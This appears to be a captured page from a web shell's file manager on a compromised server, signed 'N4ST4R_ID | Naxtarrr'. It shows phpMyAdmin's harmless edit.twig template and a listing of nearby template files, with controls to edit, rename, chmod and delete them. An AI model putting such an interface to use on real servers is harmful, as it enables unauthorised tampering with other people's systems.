Submit
Path:
~
/
/
opt
/
psa
/
phpMyAdmin
/
templates
/
database
/
central_columns
/
File Content:
edit.twig
<form id="multi_edit_central_columns"> <div class="card"> <div class="card-header">{% trans 'Structure' %}</div> <div class="card-body"> <table id="table_columns" class="table align-middle mb-0 noclick"> <thead> <tr> <th>{% trans 'Name' %}</th> <th>{% trans 'Type' %}</th> <th>{% trans 'Length/Values' %}</th> <th>{% trans 'Default' %}</th> <th>{% trans 'Collation' %}</th> <th>{% trans 'Attributes' %}</th> <th>{% trans 'Null' %}</th> <th>{% trans %}A_I{% context %}Auto Increment{% endtrans %}</th> </tr> </thead> {{ rows|raw }} </table> </div> <div class="card-footer"> <input class="btn btn-primary" type="submit" name="save_multi_central_column_edit" value="{% trans 'Save' %}"> </div> </div> </form>
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
edit.twig
828 bytes
0644
edit_table_row.twig
3826 bytes
0644
main.twig
22501 bytes
0644
populate_columns.twig
94 bytes
0644
N4ST4R_ID | Naxtarrr